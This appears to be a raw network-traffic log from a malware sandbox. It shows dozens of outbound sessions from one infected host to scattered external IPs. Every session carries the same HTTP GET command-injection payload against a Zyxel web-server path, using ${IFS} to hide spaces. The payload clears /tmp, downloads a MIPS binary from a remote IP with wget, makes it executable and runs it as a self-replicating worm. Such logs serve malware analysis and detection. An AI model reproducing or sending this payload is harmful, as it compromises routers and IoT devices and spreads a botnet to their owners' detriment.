                                                Jan 12, 2024 18:16:36.777230024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7964192.168.2.2350532179.205.117.126443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.777267933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7965192.168.2.2350924107.185.221.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.777307987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7966192.168.2.235079224.220.98.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.777353048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7967192.168.2.233425052.238.206.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:36.777389050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7968192.168.2.233402251.29.161.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785170078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7969192.168.2.235304839.239.37.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785197020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7970192.168.2.2359314182.1.203.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785242081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7971192.168.2.2338576134.168.89.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785311937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7972192.168.2.2340914119.75.219.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785351992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7973192.168.2.2352490163.118.236.122443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785378933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7974192.168.2.235513659.3.81.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785430908 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7975192.168.2.234217072.48.111.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785463095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7976192.168.2.234208014.198.156.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785521984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7977192.168.2.2356492183.1.36.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785552025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7978192.168.2.234180453.84.43.98443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785593033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7979192.168.2.2358692198.70.93.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785648108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7980192.168.2.2352636213.3.149.141443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785670042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7981192.168.2.2349664169.181.18.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785726070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7982192.168.2.23420428.221.106.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785756111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7983192.168.2.235196025.174.70.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785797119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7984192.168.2.2356166128.170.192.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785820961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7985192.168.2.2342242200.255.95.184443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785907984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7986192.168.2.2339802212.248.6.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785912037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7987192.168.2.234889620.138.167.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785948992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7988192.168.2.2354088178.53.249.57443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.785978079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7989192.168.2.2343376121.195.168.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786056042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7990192.168.2.2334168204.133.164.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786083937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7991192.168.2.2342372147.127.1.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786117077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7992192.168.2.2357082209.145.228.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786160946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7993192.168.2.235285232.199.215.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786206007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7994192.168.2.2357794141.24.20.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786241055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7995192.168.2.2348850220.27.250.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786261082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7996192.168.2.235760089.105.83.39443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786298990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7997192.168.2.2335214161.192.248.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786344051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7998192.168.2.2342954106.2.211.102443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786384106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                7999192.168.2.234433413.213.5.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786427975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8000192.168.2.2351796175.190.61.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786456108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8001192.168.2.2351018117.157.254.160443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786503077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8002192.168.2.235324262.144.36.152443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786534071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8003192.168.2.235755227.130.73.197443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786576986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8004192.168.2.235121298.98.72.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786606073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8005192.168.2.23349284.197.228.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786660910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8006192.168.2.2356130222.11.207.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786684990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8007192.168.2.2333808205.207.54.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786725044 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8008192.168.2.235117651.229.194.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786755085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8009192.168.2.2359624168.186.32.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786815882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8010192.168.2.2336994167.106.75.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786853075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8011192.168.2.2349614134.122.70.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786873102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8012192.168.2.2350228187.173.183.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786914110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8013192.168.2.23370668.106.234.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.786967039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8014192.168.2.234226223.198.110.235443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787023067 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8015192.168.2.2336866210.168.72.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787050962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8016192.168.2.2360000193.126.175.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787106037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8017192.168.2.2342682205.101.219.24443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787147045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8018192.168.2.236073049.167.230.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787192106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8019192.168.2.2334592213.69.158.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787235022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8020192.168.2.233506481.145.159.110443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787283897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8021192.168.2.234861634.171.177.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787328959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8022192.168.2.2359504163.3.84.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787369013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8023192.168.2.235235420.39.247.3443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787414074 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8024192.168.2.233928213.253.246.17443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787448883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8025192.168.2.2341700216.2.6.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:37.787488937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8026192.168.2.233411236.204.199.138443
                                                TimestampBytes transferredDirectionData
